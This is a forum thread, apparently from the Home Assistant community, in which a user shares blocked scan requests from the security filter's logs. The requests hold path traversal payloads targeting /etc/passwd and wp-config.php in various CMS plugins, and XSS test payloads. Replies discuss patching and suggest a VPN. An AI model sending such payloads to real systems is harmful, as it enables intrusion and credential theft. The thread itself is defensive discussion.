Path traversal hack tentative

I noticed that my internet facing Home assistant has been targetted yesterday evening by someone attempting a traversal path attack.

2023-01-16 19:40:54.408 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
2023-01-16 19:40:55.752 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
2023-01-16 19:40:57.125 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2023-01-16 19:40:57.261 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?sl=../../../../../../../etc/passwd%0
2023-01-16 19:40:58.153 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /src/redirect.php?plugins[]=../../../../etc/passwd%00
2023-01-16 19:40:58.537 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_imagebrowser&folder=../../../../etc/passwd
2023-01-16 19:42:13.056 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
2023-01-16 19:42:13.111 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
2023-01-16 19:42:13.687 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
2023-01-16 19:42:13.756 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2023-01-16 19:42:14.794 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
2023-01-16 19:42:40.672 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /comm.php?id=../../../../../../../../../../etc/passwd
2023-01-16 19:42:44.391 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
2023-01-16 19:44:09.777 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
2023-01-16 19:44:11.331 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
2023-01-16 19:44:11.665 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
2023-01-16 19:44:11.679 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd
2023-01-16 19:44:14.984 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
2023-01-16 19:44:16.401 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
2023-01-16 19:45:36.162 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
2023-01-16 19:45:37.323 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
2023-01-16 19:45:39.238 WARNING (MainThread) [homeassistant.components.http.security_filter] Filtered a request with a potential harmful query string: /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
... hundreds more lines of this type...

Anyone else noticed that ?

Anyone knows how to report this to developpers so that they can double check if no vulnerability is present ?

It looks like it is not specifically targetting Home assistant though, it is more generalistic

This is a known attack vector and will no longer work against home assistant. There was a security patch many many versions ago.

It is already saying that it is filtered out…

I know, but I was wondering about what would be displayed in case of successful attack…

Thanks Tom

Nothing. It would just serve the resource, in this case /etc/passwd. Thankfully this potential vulnerability (even if they specifically targeted HA, which they did not) was patched. Hence the filtered logs. This doesn’t mean there couldn’t be other yet undiscovered vulnerabilities. As far as I know, HA has never been professionally pentested.

I’d be concerned in general having my instance facing the public internet in that way. Your IP was attacked (randomly or not), there’s no guarantee they won’t try again. Possibly using a more targeted vector against HA, depending on how much they know about your system. I would absolutely switch to something more secure, like Cloudflare Zero Trust or a VPN.

1 Like

There are people testing it though. Home-assistant : Security vulnerabilities, CVEs (follow the references).